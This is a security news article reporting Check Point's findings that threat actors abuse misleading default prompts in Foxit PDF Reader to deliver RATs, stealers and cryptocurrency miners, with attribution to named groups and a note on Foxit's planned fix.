Cybercriminals Exploit Foxit PDF Reader Flaw to Spread Malware and Evade Detection
Charles M. Walls | May 20, 2024 | Views: 143
Cybercriminals are exploiting a design flaw in Foxit PDF Reader to deploy various malware strains, including Agent Tesla, AsyncRAT, DCRat, NanoCore RAT, NjRAT, Pony, Remcos RAT, and XWorm.
"This vulnerability prompts security warnings that could mislead unsuspecting users into executing dangerous commands," reported Check Point in a technical analysis. "This flaw has been leveraged by diverse threat actors, from cybercriminals to spies."
It's important to note that Adobe Acrobat Reader, which is commonly used in sandboxes and antivirus solutions, is not vulnerable to this specific exploit. This contributes to the low detection rate of the malicious campaign.
The problem arises because Foxit PDF Reader displays "OK" as the default option in a pop-up that asks users to trust the document before enabling certain features to prevent security risks.
When a user clicks OK, a second pop-up appears, warning that the file is about to execute additional commands, with "Open" as the default choice. This command downloads and executes a malicious payload from Discord's content delivery network (CDN).
"Even if the user reads the first message, they will likely agree to the second without reading," noted security researcher Antonis Terefos.
"Threat actors exploit this flawed logic and common human behavior, which makes the default choice the most harmful one," Terefos added.
Check Point identified a military-themed PDF document that, when opened with Foxit PDF Reader, executed a command to download a tool that fetched two executables. These executables collected and uploaded data, such as documents, images, archive files, and databases, to a command-and-control (C2) server.
Further investigation revealed that the downloader could also deploy a third payload to capture screenshots of the infected system, which were then uploaded to the C2 server.
This activity, likely aimed at espionage, has been linked to the DoNot Team (also known as APT-C-35 and Origami Elephant), based on similarities with previously observed tactics and techniques associated with this group.
In another instance, the same technique was used in a multi-stage attack to deploy a stealer and two cryptocurrency miner modules, XMRig and lolMiner. Some of these malicious PDF files were distributed via Facebook.
The Python-based stealer malware is designed to steal credentials and cookies from Chrome and Edge browsers. The miners were retrieved from a Gitlab repository belonging to a user named topworld20241. The repository, created on February 17, 2024, remains active.
Another case documented by the cybersecurity firm involved a PDF file that retrieved Blank-Grabber, an open-source information stealer available on GitHub until it was archived on August 6, 2023, from Discord CDN.
"One interesting incident involved a malicious PDF with a hyperlink to an attachment hosted on trello[.]com," Terefos said. "Downloading it revealed a secondary PDF file containing malicious code, exploiting Foxit Reader users."
This infection pathway resulted in the delivery of Remcos RAT, but only after multiple steps involving LNK files, HTML Application (HTA), and Visual Basic scripts.
The threat actor behind the Remcos RAT campaign, known as silentkillertv, claims to be an ethical hacker with over 22 years of experience. They have been observed promoting various malicious tools via a Telegram channel called silent_tools, including crypters and PDF exploits targeting Foxit PDF Reader. This channel was created on April 21, 2022.
Check Point also identified .NET- and Python-based PDF builder services like Avict Softwares I Exploit PDF, PDF Exploit Builder 2023, and FuckCrypt, which were used to create the malware-laced PDF files. The DoNot Team reportedly used a .NET PDF builder available on GitHub.
The use of platforms like Discord, Gitlab, and Trello highlights the ongoing abuse of legitimate websites by threat actors to blend in with normal network traffic, evade detection, and distribute malware. Foxit has acknowledged the issue and plans to release a fix in version 2024 3. The current version is 2024.2.1.25153.
"Although this exploit doesn't traditionally trigger malicious activities, it can be seen as a form of phishing or manipulation, tricking Foxit PDF Reader users into habitually clicking 'OK' without understanding the risks," Terefos explained.
"The high infection success rate and low detection allow these malicious PDFs to be distributed via unconventional methods, such as Facebook, without being intercepted by detection rules," he concluded.
